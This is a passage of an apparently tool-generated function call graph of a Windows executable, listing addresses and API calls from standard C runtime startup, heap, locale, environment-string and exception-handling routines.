17570->17568 17574 b47890 CatchIt 17571->17574 17572 b48dd1 TranslatorGuardHandler 5 API calls 17573 b48701 17572->17573 17573->17557 17574->17572 17576 b3dd82 17575->17576 17579 b48e41 17576->17579 17578 b3de64 17586 b48ebd 17579->17586 17582 b49ab5 Concurrency::cancel_current_task RaiseException 17583 b48e60 17582->17583 17589 b448f0 17583->17589 17595 b48ddf 17586->17595 17591 b44942 17589->17591 17590 b49cfd 40 API calls ___std_exception_copy 17590->17591 17591->17590 17592 b44aeb 17591->17592 17593 b48dd1 TranslatorGuardHandler 5 API calls 17592->17593 17594 b44cbb 17593->17594 17594->17578 17598 b49cfd 17595->17598 17599 b49d0a 17598->17599 17605 b48e0b 17598->17605 17599->17605 17606 b4bc8f 17599->17606 17602 b49d37 17604 b4bc74 ___std_exception_destroy 14 API calls 17602->17604 17603 b4c1ec ___std_exception_copy 39 API calls 17603->17602 17604->17605 17605->17582 17611 b4eb9b __dosmaperr 17606->17611 17607 b4ebd9 17609 b4e41c __strnicoll 14 API calls 17607->17609 17608 b4ebc4 RtlAllocateHeap 17610 b49d27 17608->17610 17608->17611 17609->17610 17610->17602 17610->17603 17611->17607 17611->17608 17612 b4abd8 __dosmaperr 2 API calls 17611->17612 17612->17611 16318 b2b0e4 ReadFile 16319 b2a1f0 16318->16319 16320 b49132 16321 b4913e ___scrt_is_nonwritable_in_current_image 16320->16321 16346 b493ef 16321->16346 16323 b49145 16324 b4929e 16323->16324 16333 b4916f ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 16323->16333 16383 b496af IsProcessorFeaturePresent 16324->16383 16326 b492a5 16387 b4a8a6 16326->16387 16331 b4918e 16333->16331 16336 b4920f 16333->16336 16361 b4a8f0 16333->16361 16335 b49215 16368 b33270 16335->16368 16357 b4b426 16336->16357 16341 b4923a 16342 b49243 16341->16342 16374 b4a8d2 16341->16374 16377 b49428 16342->16377 16347 b493f8 16346->16347 16393 b498d5 IsProcessorFeaturePresent 16347->16393 16351 b49409 16356 b4940d 16351->16356 16403 b4a770 16351->16403 16353 b49424 16353->16323 16356->16323 16358 b4b42f 16357->16358 16359 b4b434 16357->16359 16475 b4b54f 16358->16475 16359->16335 16362 b4a906 __dosmaperr 16361->16362 16363 b4bd2b ___scrt_is_nonwritable_in_current_image 16361->16363 16362->16336 16364 b4cb8a _unexpected 39 API calls 16363->16364 16367 b4bd3c 16364->16367 16365 b4c09e __FrameHandler3::FrameUnwindToState 39 API calls 16366 b4bd66 16365->16366 16367->16365 16369 b332c0 16368->16369 16370 b48dd1 TranslatorGuardHandler 5 API calls 16369->16370 16371 b3342b 16370->16371 16372 b4965c GetModuleHandleW 16371->16372 16373 b49236 16372->16373 16373->16326 16373->16341 17209 b4a9f1 16374->17209 16378 b49434 16377->16378 16382 b4924c 16378->16382 17280 b4a782 16378->17280 16380 b49442 16381 b49dda ___scrt_uninitialize_crt 7 API calls 16380->16381 16381->16382 16382->16331 16384 b496c5 __FrameHandler3::FrameUnwindToState 16383->16384 16385 b49770 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16384->16385 16386 b497bb __FrameHandler3::FrameUnwindToState 16385->16386 16386->16326 16388 b4a9f1 __FrameHandler3::FrameUnwindToState 21 API calls 16387->16388 16389 b492ab 16388->16389 16390 b4a8bc 16389->16390 16391 b4a9f1 __FrameHandler3::FrameUnwindToState 21 API calls 16390->16391 16392 b492b3 16391->16392 16394 b49404 16393->16394 16395 b49dbb 16394->16395 16412 b4c246 16395->16412 16398 b49dc4 16398->16351 16400 b49dcc 16401 b49dd7 16400->16401 16426 b4c282 16400->16426 16401->16351 16466 b4dc85 16403->16466 16406 b49dda 16407 b49de3 16406->16407 16408 b49ded 16406->16408 16409 b4c115 ___vcrt_uninitialize_ptd 6 API calls 16407->16409 16408->16356 16410 b49de8 16409->16410 16411 b4c282 ___vcrt_uninitialize_locks DeleteCriticalSection 16410->16411 16411->16408 16414 b4c24f 16412->16414 16415 b4c278 16414->16415 16416 b49dc0 16414->16416 16430 b50bdb 16414->16430 16417 b4c282 ___vcrt_uninitialize_locks DeleteCriticalSection 16415->16417 16416->16398 16418 b4c0e2 16416->16418 16417->16416 16447 b50aec 16418->16447 16421 b4c0f7 16421->16400 16424 b4c112 16424->16400 16427 b4c2ac 16426->16427 16428 b4c28d 16426->16428 16427->16398 16429 b4c297 DeleteCriticalSection 16428->16429 16429->16427 16429->16429 16435 b50c6d 16430->16435 16433 b50c13 InitializeCriticalSectionAndSpinCount 16434 b50bfe 16433->16434 16434->16414 16436 b50c8e 16435->16436 16437 b50bf5 16435->16437 16436->16437 16438 b50cf6 GetProcAddress 16436->16438 16440 b50ce7 16436->16440 16442 b50c22 LoadLibraryExW 16436->16442 16437->16433 16437->16434 16438->16437 16440->16438 16441 b50cef FreeLibrary 16440->16441 16441->16438 16443 b50c39 GetLastError 16442->16443 16444 b50c69 16442->16444 16443->16444 16445 b50c44 ___vcrt_FlsFree 16443->16445 16444->16436 16445->16444 16446 b50c5a LoadLibraryExW 16445->16446 16446->16436 16448 b50c6d ___vcrt_FlsFree 5 API calls 16447->16448 16449 b50b06 16448->16449 16450 b50b1f TlsAlloc 16449->16450 16451 b4c0ec 16449->16451 16451->16421 16452 b50b9d 16451->16452 16453 b50c6d ___vcrt_FlsFree 5 API calls 16452->16453 16454 b50bb7 16453->16454 16455 b50bd2 TlsSetValue 16454->16455 16456 b4c105 16454->16456 16455->16456 16456->16424 16457 b4c115 16456->16457 16458 b4c125 16457->16458 16459 b4c11f 16457->16459 16458->16421 16461 b50b27 16459->16461 16462 b50c6d ___vcrt_FlsFree 5 API calls 16461->16462 16463 b50b41 16462->16463 16464 b50b59 TlsFree 16463->16464 16465 b50b4d 16463->16465 16464->16465 16465->16458 16467 b4dc95 16466->16467 16468 b49416 16466->16468 16467->16468 16470 b4d2b2 16467->16470 16468->16353 16468->16406 16471 b4d2b9 16470->16471 16472 b4d2fc GetStdHandle 16471->16472 16473 b4d35e 16471->16473 16474 b4d30f GetFileType 16471->16474 16472->16471 16473->16467 16474->16471 16476 b4b558 16475->16476 16480 b4b56e 16475->16480 16476->16480 16481 b4b490 16476->16481 16478 b4b565 16478->16480 16498 b4b65d 16478->16498 16480->16359 16482 b4b49c 16481->16482 16483 b4b499 16481->16483 16507 b4d400 16482->16507 16483->16478 16488 b4b4ad 16490 b4dc4b ___free_lconv_mon 14 API calls 16488->16490 16489 b4b4b9 16534 b4b57b 16489->16534 16492 b4b4b3 16490->16492 16492->16478 16494 b4dc4b ___free_lconv_mon 14 API calls 16495 b4b4dd 16494->16495 16496 b4dc4b ___free_lconv_mon 14 API calls 16495->16496 16497 b4b4e3 16496->16497 16497->16478 16499 b4b6ce 16498->16499 16500 b4b66c 16498->16500 16499->16480 16500->16499 16501 b4eb3e __dosmaperr 14 API calls 16500->16501 16502 b4b6d2 16500->16502 16504 b5010e WideCharToMultiByte ___scrt_uninitialize_crt 16500->16504 16506 b4dc4b ___free_lconv_mon 14 API calls 16500->16506 16928 b502e1 16500->16928 16501->16500 16503 b4dc4b ___free_lconv_mon 14 API calls 16502->16503 16503->16499 16504->16500 16506->16500 16508 b4b4a2 16507->16508 16509 b4d409 16507->16509 16513 b5020a GetEnvironmentStringsW 16508->16513 16556 b4cc45 16509->16556 16514 b50222 16513->16514 16529 b4b4a7 16513->16529 16515 b5010e ___scrt_uninitialize_crt WideCharToMultiByte 16514->16515 16516 b5023f 16515->16516 16517 b50254 16516->16517 16518 b50249 FreeEnvironmentStringsW 16516->16518 16519 b4eb9b __strnicoll 15 API calls 16517->16519 16518->16529 16520 b5025b 16519->16520 16521 b50274 16520->16521 16522 b50263 16520->16522 16524 b5010e ___scrt_uninitialize_crt WideCharToMultiByte 16521->16524 16523 b4dc4b ___free_lconv_mon 14 API calls 16522->16523 16526 b50268 FreeEnvironmentStringsW 16523->16526 16525 b50284 16524->16525 16527 b50293 16525->16527 16528 b5028b 16525->16528 16526->16529 16531 b4dc4b ___free_lconv_mon 14 API calls 16527->16531 16530 b4dc4b ___free_lconv_mon 14 API calls 16528->16530 16529->16488 16529->16489 16532 b50291 FreeEnvironmentStringsW 16530->16532 16531->16532 16532->16529 16535 b4b590 16534->16535 16536 b4eb3e __dosmaperr 14 API calls 16535->16536 16537 b4b5b7 16536->16537 16538 b4b5bf 16537->16538 16547 b4b5c9 16537->16547 16539 b4dc4b ___free_lconv_mon 14 API calls 16538->16539 16555 b4b4c0 16539->16555 16540 b4b626 16541 b4dc4b ___free_lconv_mon 14 API calls 16540->16541 16541->16555 16542 b4eb3e __dosmaperr 14 API calls 16542->16547 16543 b4b635 16918 b4b520 16543->16918 16547->16540 16547->16542 16547->16543 16549 b4b650 16547->16549 16551 b4dc4b ___free_lconv_mon 14 API calls 16547->16551 16909 b4c1ec 16547->16909 16548 b4dc4b ___free_lconv_mon 14 API calls 16550 b4b642 16548->16550 16924 b4b766 IsProcessorFeaturePresent 16549->16924 16553 b4dc4b ___free_lconv_mon 14 API calls 16550->16553 16551->16547 16553->16555 16554 b4b65c 16555->16494 16557 b4cc50 16556->16557 16558 b4cc56 16556->16558 16559 b4c700 __dosmaperr 6 API calls 16557->16559 16560 b4c73f __dosmaperr 6 API calls 16558->16560 16562 b4cc5c 16558->16562 16559->16558 16561 b4cc70 16560->16561 16561->16562 16563 b4cc74 16561->16563 16565 b4cc61 16562->16565 16606 b4c09e 16562->16606 16566 b4eb3e __dosmaperr 14 API calls 16563->16566 16584 b4d843 16565->16584 16568 b4cc80 16566->16568 16569 b4cc9d 16568->16569 16570 b4cc88 16568->16570 16572 b4c73f __dosmaperr 6 API calls 16569->16572 16571 b4c73f __dosmaperr 6 API calls 16570->16571 16573 b4cc94 16571->16573 16574 b4cca9 16572->16574 16577 b4dc4b ___free_lconv_mon 14 API calls 16573->16577 16575 b4ccbc 16574->16575 16576 b4ccad 16574->16576 16579 b4ce9c __dosmaperr 14 API calls 16575->16579 16578 b4c73f __dosmaperr 6 API calls 16576->16578 16580 b4cc9a 16577->16580 16578->16573 16581 b4ccc7 16579->16581 16580->16562 16582 b4dc4b ___free_lconv_mon 14 API calls 16581->16582 16583 b4ccce 16582->16583 16583->16565 16585 b4d86d 16584->16585 16730 b4d6cf 16585->16730 16588 b4d886 16588->16508 16591 b4d8ad 16744 b4d4ca 16591->16744 16592 b4d89f 16593 b4dc4b ___free_lconv_mon 14 API calls 16592->16593 16593->16588 16596 b4d8e5 16597 b4e41c __strnicoll 14 API calls 16596->16597 16600 b4d8ea 16597->16600 16598 b4d92c 16601 b4d975 16598->16601 16755 b4dbfe 16598->16755 16599 b4d900 16599->16598 16603 b4dc4b ___free_lconv_mon 14 API calls 16599->16603 16602 b4dc4b ___free_lconv_mon 14 API calls 16600->16602 16605 b4dc4b ___free_lconv_mon 14 API calls 16601->16605 16602->16588 16603->16598 16605->16588 16617 b4dd3c 16606->16617 16609 b4c0ae 16611 b4c0b8 IsProcessorFeaturePresent 16609->16611 16616 b4c0d7 16609->16616 16613 b4c0c4 16611->16613 16612 b4a8bc __FrameHandler3::FrameUnwindToState 21 API calls 16614 b4c0e1 16612->16614 16647 b4b79a 16613->16647 16616->16612 16653 b4dfbf 16617->16653 16620 b4dd63 16621 b4dd6f ___scrt_is_nonwritable_in_current_image 16620->16621 16622 b4dda0 __FrameHandler3::FrameUnwindToState 16621->16622 16623 b4ccdb __dosmaperr 14 API calls 16621->16623 16624 b4ddbf 16621->16624 16626 b4ddd1 __FrameHandler3::FrameUnwindToState 16621->16626 16622->16624 16622->16626 16646 b4dda9 16622->16646 16623->16622 16625 b4e41c __strnicoll 14 API calls 16624->16625 16628 b4ddc4 16625->16628 16627 b4de07 __FrameHandler3::FrameUnwindToState 16626->16627 16667 b4cae1 EnterCriticalSection 16626->16667 16632 b4de44 16627->16632 16633 b4df41 16627->16633 16643 b4de72 16627->16643 16664 b4b739 16628->16664 16632->16643 16668 b4cb8a GetLastError 16632->16668 16635 b4df4c 16633->16635 16699 b4caf8 LeaveCriticalSection 16633->16699 16637 b4a8bc __FrameHandler3::FrameUnwindToState 21 API calls 16635->16637 16639 b4df54 16637->16639 16640 b4cb8a _unexpected 39 API calls 16644 b4dec7 16640->16644 16642 b4cb8a _unexpected 39 API calls 16642->16643 16695 b4deed 16643->16695 16645 b4cb8a _unexpected 39 API calls 16644->16645 16644->16646 16645->16646 16646->16609 16648 b4b7b6 __FrameHandler3::FrameUnwindToState 16647->16648 16649 b4b7e2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16648->16649 16650 b4b8b3 __FrameHandler3::FrameUnwindToState 16649->16650 16722 b48dd1 16650->16722 16652 b4b8d1 16652->16616 16654 b4dfcb ___scrt_is_nonwritable_in_current_image 16653->16654 16659 b4cae1 EnterCriticalSection 16654->16659 16656 b4dfd9 16660 b4e01b 16656->16660 16659->16656 16663 b4caf8 LeaveCriticalSection 16660->16663 16662 b4c0a3 16662->16609 16662->16620 16663->16662 16700 b4ba6f 16664->16700 16667->16627 16669 b4cba0 16668->16669 16670 b4cba6 16668->16670 16672 b4c700 __dosmaperr 6 API calls 16669->16672 16671 b4c73f __dosmaperr 6 API calls 16670->16671 16674 b4cbaa SetLastError 16670->16674 16673 b4cbc2 16671->16673 16672->16670 16673->16674 16676 b4eb3e __dosmaperr 14 API calls 16673->16676 16678 b4cc3f 16674->16678 16679 b4cc3a 16674->16679 16677 b4cbd7 16676->16677 16680 b4cbf0 16677->16680 16681 b4cbdf 16677->16681 16682 b4c09e __FrameHandler3::FrameUnwindToState 37 API calls 16678->16682 16679->16642 16684 b4c73f __dosmaperr 6 API calls 16680->16684 16683 b4c73f __dosmaperr 6 API calls 16681->16683 16685 b4cc44 16682->16685 16692 b4cbed 16683->16692 16686 b4cbfc 16684->16686 16687 b4cc17 16686->16687 16688 b4cc00 16686->16688 16690 b4ce9c __dosmaperr 14 API calls 16687->16690 16691 b4c73f __dosmaperr 6 API calls 16688->16691 16689 b4dc4b ___free_lconv_mon 14 API calls 16689->16674 16693 b4cc22 16690->16693 16691->16692 16692->16689 16694 b4dc4b ___free_lconv_mon 14 API calls 16693->16694 16694->16674 16696 b4def1 16695->16696 16697 b4deb9 16695->16697 16721 b4caf8 LeaveCriticalSection 16696->16721 16697->16640 16697->16644 16697->16646 16699->16635 16701 b4ba81 __strnicoll 16700->16701 16706 b4b8e2 16701->16706 16707 b4b8f2 16706->16707 16708 b4b8f9 16706->16708 16709 b4ba00 __strnicoll 16 API calls 16707->16709 16710 b4ba46 __strnicoll GetLastError SetLastError 16708->16710 16714 b4b907 16708->16714 16709->16708 16711 b4b92e 16710->16711 16712 b4b766 __strnicoll 11 API calls 16711->16712 16711->16714 16713 b4b95e 16712->16713 16715 b4b9a7 16714->16715 16716 b4b9b3 16715->16716 16717 b4b9ca 16716->16717 16718 b4b9e3 __strnicoll 39 API calls 16716->16718 16719 b4b745 16717->16719 16720 b4b9e3 __strnicoll 39 API calls 16717->16720 16718->16717 16719->16646 16720->16719 16721->16697 16723 b48dd9 16722->16723 16724 b48dda IsProcessorFeaturePresent 16722->16724 16723->16652 16726 b48f4a 16724->16726 16729 b4902f SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16726->16729 16728 b4902d 16728->16652 16729->16728 16763 b4d448 16730->16763 16733 b4d6f0 GetOEMCP 16735 b4d719 16733->16735 16734 b4d702 16734->16735 16736 b4d707 GetACP 16734->16736 16735->16588 16737 b4eb9b 16735->16737 16736->16735 16738 b4ebd9 16737->16738 16742 b4eba9 __dosmaperr 16737->16742 16740 b4e41c __strnicoll 14 API calls 16738->16740 16739 b4ebc4 RtlAllocateHeap 16741 b4d897 16739->16741 16739->16742 16740->16741 16741->16591 16741->16592 16742->16738 16742->16739 16743 b4abd8 __dosmaperr 2 API calls 16742->16743 16743->16742 16745 b4d6cf 41 API calls 16744->16745 16746 b4d4ea 16745->16746 16747 b4d5ef 16746->16747 16749 b4d527 IsValidCodePage 16746->16749 16754 b4d542 __FrameHandler3::FrameUnwindToState 16746->16754 16748 b48dd1 TranslatorGuardHandler 5 API calls 16747->16748 16750 b4d6cd 16748->16750 16749->16747 16751 b4d539 16749->16751 16750->16596 16750->16599 16752 b4d562 GetCPInfo 16751->16752 16751->16754 16752->16747 16752->16754 16803 b4da59 16754->16803 16756 b4dc0a ___scrt_is_nonwritable_in_current_image 16755->16756 16883 b4cae1 EnterCriticalSection 16756->16883 16758 b4dc14 16884 b4d998 16758->16884 16764 b4d466 16763->16764 16765 b4d45f 16763->16765 16764->16765 16766 b4cb8a _unexpected 39 API calls 16764->16766 16765->16733 16765->16734 16767 b4d487 16766->16767 16771 b50916 16767->16771 16772 b4d49d 16771->16772 16773 b50929 16771->16773 16775 b50943 16772->16775 16773->16772 16779 b4f0cf 16773->16779 16776 b50956 16775->16776 16777 b5096b 16775->16777 16776->16777 16800 b4d3e3 16776->16800 16777->16765 16780 b4f0db ___scrt_is_nonwritable_in_current_image 16779->16780 16781 b4cb8a _unexpected 39 API calls 16780->16781 16782 b4f0e4 16781->16782 16783 b4f12a 16782->16783 16792 b4cae1 EnterCriticalSection 16782->16792 16783->16772 16785 b4f102 16793 b4f150 16785->16793 16790 b4c09e __FrameHandler3::FrameUnwindToState 39 API calls 16791 b4f14f 16790->16791 16792->16785 16794 b4f15e __dosmaperr 16793->16794 16796 b4f113 16793->16796 16795 b4ef04 __dosmaperr 14 API calls 16794->16795 16794->16796 16795->16796 16797 b4f12f 16796->16797 16798 b4caf8 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 16797->16798 16799 b4f126 16798->16799 16799->16783 16799->16790 16801 b4cb8a _unexpected 39 API calls 16800->16801 16802 b4d3e8 16801->16802 16802->16777 16804 b4da81 GetCPInfo 16803->16804 16813 b4db4a 16803->16813 16805 b4da99 16804->16805 16804->16813 16814 b4ec43 16805->16814 16806 b48dd1 TranslatorGuardHandler 5 API calls 16808 b4dbfc 16806->16808 16808->16747 16812 b50e3f 44 API calls 16812->16813 16813->16806 16815 b4d448 __strnicoll 39 API calls 16814->16815 16816 b4ec63 16815->16816 16834 b4ed44 16816->16834 16818 b4ed1f 16821 b48dd1 TranslatorGuardHandler 5 API calls 16818->16821 16819 b4ed17 16837 b4ec23 16819->16837 16820 b4ec90 16820->16818 16820->16819 16823 b4eb9b __strnicoll 15 API calls 16820->16823 16825 b4ecb5 __FrameHandler3::FrameUnwindToState __alloca_probe_16 16820->16825 16824 b4db01 16821->16824 16823->16825 16829 b50e3f 16824->16829 16825->16819 16826 b4ed44 __strnicoll MultiByteToWideChar 16825->16826 16827 b4ecfe 16826->16827 16827->16819 16828 b4ed05 GetStringTypeW 16827->16828 16828->16819 16830 b4d448 __strnicoll 39 API calls 16829->16830 16831 b50e52 16830->16831 16843 b50e88 16831->16843 16841 b4ed6e 16834->16841 16838 b4ec2f 16837->16838 16840 b4ec40 16837->16840 16839 b4dc4b ___free_lconv_mon 14 API calls 16838->16839 16838->16840 16839->16840 16840->16818 16842 b4ed60 MultiByteToWideChar 16841->16842 16842->16820 16844 b50ea3 __strnicoll 16843->16844 16845 b4ed44 __strnicoll MultiByteToWideChar 16844->16845 16849 b50ee7 16845->16849 16846 b51062 16847 b48dd1 TranslatorGuardHandler 5 API calls 16846->16847 16848 b4db22 16847->16848 16848->16812 16849->16846 16850 b4eb9b __strnicoll 15 API calls 16849->16850 16852 b50f0d __alloca_probe_16 16849->16852 16863 b50fb5 16849->16863 16850->16852 16851 b4ec23 __freea 14 API calls 16851->16846 16853 b4ed44 __strnicoll MultiByteToWideChar 16852->16853 16852->16863 16854 b50f56 16853->16854 16854->16863 16871 b4c7cc 16854->16871 16857 b50fc4 16859 b5104d 16857->16859 16860 b4eb9b __strnicoll 15 API calls 16857->16860 16864 b50fd6 __alloca_probe_16 16857->16864 16858 b50f8c 16862 b4c7cc 7 API calls 16858->16862 16858->16863 16861 b4ec23 __freea 14 API calls 16859->16861 16860->16864 16861->16863 16862->16863 16863->16851 16864->16859 16865 b4c7cc 7 API calls 16864->16865 16866 b51019 16865->16866 16866->16859 16880 b5010e 16866->16880 16868 b51033 16868->16859 16869 b5103c 16868->16869 16870 b4ec23 __freea 14 API calls 16869->16870 16870->16863 16872 b4ca1e LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 16871->16872 16873 b4c7d7 16872->16873 16874 b4c804 16873->16874 16875 b4c7dd LCMapStringEx 16873->16875 16876 b4c829 __strnicoll 5 API calls 16874->16876 16879 b4c824 16875->16879 16877 b4c81d LCMapStringW 16876->16877 16877->16879 16879->16857 16879->16858 16879->16863 16882 b50121 ___scrt_uninitialize_crt 16880->16882 16881 b5015f WideCharToMultiByte 16881->16868 16882->16881 16883->16758 16894 b4d362 16884->16894 16886 b4d9ba 16887 b4d362 39 API calls 16886->16887 16888 b4d9d9 16887->16888 16889 b4da00 16888->16889 16890 b4dc4b ___free_lconv_mon 14 API calls 16888->16890 16891 b4dc3f 16889->16891 16890->16889 16908 b4caf8 LeaveCriticalSection 16891->16908 16893 b4dc2d 16893->16601 16895 b4d373 16894->16895 16896 b4d36f CatchIt 16894->16896 16897 b4d37a 16895->16897 16901 b4d38d __FrameHandler3::FrameUnwindToState 16895->16901 16896->16886 16898 b4e41c __strnicoll 14 API calls 16897->16898 16899 b4d37f 16898->16899 16900 b4b739 __strnicoll 39 API calls 16899->16900 16900->16896 16901->16896 16902 b4d3c4 16901->16902 16903 b4d3bb 16901->16903 16902->16896 16906 b4e41c __strnicoll 14 API calls 16902->16906 16904 b4e41c __strnicoll 14 API calls 16903->16904 16905 b4d3c0 16904->16905 16907 b4b739 __strnicoll 39 API calls 16905->16907 16906->16905 16907->16896 16908->16893 16910 b4c1fa 16909->16910 16911 b4c208 16909->16911 16910->16911 16916 b4c220 16910->16916 16912 b4e41c __strnicoll 14 API calls 16911->16912 16913 b4c210 16912->16913 16915 b4b739 __strnicoll 39 API calls 16913->16915 16914 b4c21a 16914->16547 16915->16914 16916->16914 16917 b4e41c __strnicoll 14 API calls 16916->16917 16917->16913 16919 b4b54a 16918->16919 16920 b4b52d 16918->16920 16919->16548 16921 b4b544 16920->16921 16922 b4dc4b ___free_lconv_mon 14 API calls 16920->16922 16923 b4dc4b ___free_lconv_mon 14 API calls 16921->16923 16922->16920 16923->16919 16925 b4b772 16924->16925 16926 b4b79a __FrameHandler3::FrameUnwindToState 8 API calls 16925->16926 16927 b4b787 GetCurrentProcess TerminateProcess 16926->16927 16927->16554 16929 b502ec 16928->16929 16930 b502fd 16929->16930 16932 b50310 ___from_strstr_to_strchr 16929->16932 16931 b4e41c __strnicoll 14 API calls 16930->16931 16940 b50302 16931->16940 16933 b50527 16932->16933 16935 b50330 16932->16935 16934 b4e41c __strnicoll 14 API calls 16933->16934 16936 b5052c 16934->16936 16991 b5054c 16935->16991 16938 b4dc4b ___free_lconv_mon 14 API calls 16936->16938 16938->16940 16940->16500 16941 b50374 16977 b50360 16941->16977 16995 b50566 16941->16995 16942 b50376 16946 b4eb3e __dosmaperr 14 API calls 16942->16946 16942->16977 16943 b50352 16949 b5036f 16943->16949 16950 b5035b 16943->16950 16948 b50384 16946->16948 16947 b4dc4b ___free_lconv_mon 14 API calls 16947->16940 16952 b4dc4b ___free_lconv_mon 14 API calls 16948->16952 16955 b5054c 39 API calls 16949->16955 16954 b4e41c __strnicoll 14 API calls 16950->16954 16951 b503e9 16956 b4dc4b ___free_lconv_mon 14 API calls 16951->16956 16953 b5038f 16952->16953 16953->16941 16959 b4eb3e __dosmaperr 14 API calls 16953->16959 16953->16977 16954->16977 16955->16941 16961 b503f1 16956->16961 16957 b50434 16958 b50024 42 API calls 16957->16958 16957->16977 16960 b50462 16958->16960 16962 b503ab 16959->16962 16964 b4dc4b ___free_lconv_mon 14 API calls 16960->16964 16967 b5041e 16961->16967 16999 b50024 16961->16999 16966 b4dc4b ___free_lconv_mon 14 API calls 16962->16966 16963 b5051c 16968 b4dc4b ___free_lconv_mon 14 API calls 16963->16968 16964->16967 16966->16941 16967->16963 16967->16967 16971 b4eb3e __dosmaperr 14 API calls 16967->16971 16967->16977 16968->16940 16969 b50415 16970 b4dc4b ___free_lconv_mon 14 API calls 16969->16970 16970->16967 16972 b504ad 16971->16972 16973 b504b5 16972->16973 16974 b504bd 16972->16974 16975 b4dc4b ___free_lconv_mon 14 API calls 16973->16975 16976 b4c1ec ___std_exception_copy 39 API calls 16974->16976 16975->16977 16978 b504c9 16976->16978 16977->16947 16979 b50541 16978->16979 16980 b504d0 16978->16980 16982 b4b766 __strnicoll 11 API calls 16979->16982 17008 b5366c 16980->17008 16984 b5054b 16982->16984 16985 b504f7 16987 b4e41c __strnicoll 14 API calls 16985->16987 16986 b50516 16988 b4dc4b ___free_lconv_mon 14 API calls 16986->16988 16989 b504fc 16987->16989 16988->16963 16990 b4dc4b ___free_lconv_mon 14 API calls 16989->16990 16990->16977 16992 b50559 16991->16992 16994 b5033b 16991->16994 17023 b505bb 16992->17023 16994->16941 16994->16942 16994->16943 16996 b503d9 16995->16996 16997 b5057c 16995->16997 16996->16951 16996->16957 16997->16996 17038 b5357b 16997->17038 17000 b50031 16999->17000 17001 b5004c 16999->17001 17000->17001 17002 b5003d 17000->17002 17003 b5005b 17001->17003 17138 b533a8 17001->17138 17004 b4e41c __strnicoll 14 API calls 17002->17004 17145 b533db 17003->17145 17007 b50042 __FrameHandler3::FrameUnwindToState 17004->17007 17007->16969 17157 b4f1ca 17008->17157 17013 b536df 17014 b536eb 17013->17014 17016 b4dc4b ___free_lconv_mon 14 API calls 17013->17016 17017 b504f1 17014->17017 17020 b4dc4b ___free_lconv_mon 14 API calls 17014->17020 17015 b4f1ca 39 API calls 17018 b536bc 17015->17018 17016->17014 17017->16985 17017->16986 17019 b4f262 17 API calls 17018->17019 17021 b536c9 17019->17021 17020->17017 17021->17013 17022 b536d3 SetEnvironmentVariableW 17021->17022 17022->17013 17024 b505ce 17023->17024 17025 b505c9 17023->17025 17026 b4eb3e __dosmaperr 14 API calls 17024->17026 17025->16994 17035 b505eb 17026->17035 17027 b50659 17029 b4c09e __FrameHandler3::FrameUnwindToState 39 API calls 17027->17029 17028 b50648 17031 b4dc4b ___free_lconv_mon 14 API calls 17028->17031 17030 b5065e 17029->17030 17032 b4b766 __strnicoll 11 API calls 17030->17032 17031->17025 17033 b5066a 17032->17033 17034 b4eb3e __dosmaperr 14 API calls 17034->17035 17035->17027 17035->17028 17035->17030 17035->17034 17036 b4dc4b ___free_lconv_mon 14 API calls 17035->17036 17037 b4c1ec ___std_exception_copy 39 API calls 17035->17037 17036->17035 17037->17035 17039 b5358f 17038->17039 17040 b53589 17038->17040 17056 b535a4 17039->17056 17043 b53dd7 17040->17043 17044 b53e1f 17040->17044 17046 b53ddd 17043->17046 17049 b53dfa 17043->17049 17076 b53e35 17044->17076 17048 b4e41c __strnicoll 14 API calls 17046->17048 17047 b53ded 17047->16997 17050 b53de2 17048->17050 17052 b4e41c __strnicoll 14 API calls 17049->17052 17055 b53e18 17049->17055 17051 b4b739 __strnicoll 39 API calls 17050->17051 17051->17047 17053 b53e09 17052->17053 17054 b4b739 __strnicoll 39 API calls 17053->17054 17054->17047 17055->16997 17057 b4d448 __strnicoll 39 API calls 17056->17057 17058 b535ba 17057->17058 17059 b535d6 17058->17059 17060 b535ed 17058->17060 17072 b5359f 17058->17072 17061 b4e41c __strnicoll 14 API calls 17059->17061 17063 b535f6 17060->17063 17064 b53608 17060->17064 17062 b535db 17061->17062 17067 b4b739 __strnicoll 39 API calls 17062->17067 17068 b4e41c __strnicoll 14 API calls 17063->17068 17065 b53615 17064->17065 17066 b53628 17064->17066 17070 b53e35 __strnicoll 39 API calls 17065->17070 17094 b53f00 17066->17094 17067->17072 17069 b535fb 17068->17069 17073 b4b739 __strnicoll 39 API calls 17069->17073 17070->17072 17072->16997 17073->17072 17075 b4e41c __strnicoll 14 API calls 17075->17072 17077 b53e45 17076->17077 17078 b53e5f 17076->17078 17079 b4e41c __strnicoll 14 API calls 17077->17079 17080 b53e67 17078->17080 17081 b53e7e 17078->17081 17084 b53e4a 17079->17084 17085 b4e41c __strnicoll 14 API calls 17080->17085 17082 b53ea1 17081->17082 17083 b53e8a 17081->17083 17090 b4d448 __strnicoll 39 API calls 17082->17090 17093 b53e55 17082->17093 17086 b4e41c __strnicoll 14 API calls 17083->17086 17087 b4b739 __strnicoll 39 API calls 17084->17087 17088 b53e6c 17085->17088 17089 b53e8f 17086->17089 17087->17093 17091 b4b739 __strnicoll 39 API calls 17088->17091 17092 b4b739 __strnicoll 39 API calls 17089->17092 17090->17093 17091->17093 17092->17093 17093->17047 17095 b4d448 __strnicoll 39 API calls 17094->17095 17096 b53f13 17095->17096 17099 b53f46 17096->17099 17101 b53f7a __strnicoll 17099->17101 17100 b48dd1 TranslatorGuardHandler 5 API calls 17102 b5363e 17100->17102 17103 b53ffa 17101->17103 17104 b541de 17101->17104 17106 b53fe7 GetCPInfo 17101->17106 17111 b53ffe 17101->17111 17102->17072 17102->17075 17105 b4ed44 __strnicoll MultiByteToWideChar 17103->17105 17103->17111 17107 b54080 17105->17107 17106->17103 17106->17111 17108 b541d2 17107->17108 17110 b4eb9b __strnicoll 15 API calls 17107->17110 17107->17111 17112 b540a7 __alloca_probe_16 17107->17112 17109 b4ec23 __freea 14 API calls 17108->17109 17109->17111 17110->17112 17111->17100 17111->17104 17112->17108 17113 b4ed44 __strnicoll MultiByteToWideChar 17112->17113 17114 b540f3 17113->17114 17114->17108 17115 b4ed44 __strnicoll MultiByteToWideChar 17114->17115 17116 b5410f 17115->17116 17116->17108 17117 b5411d 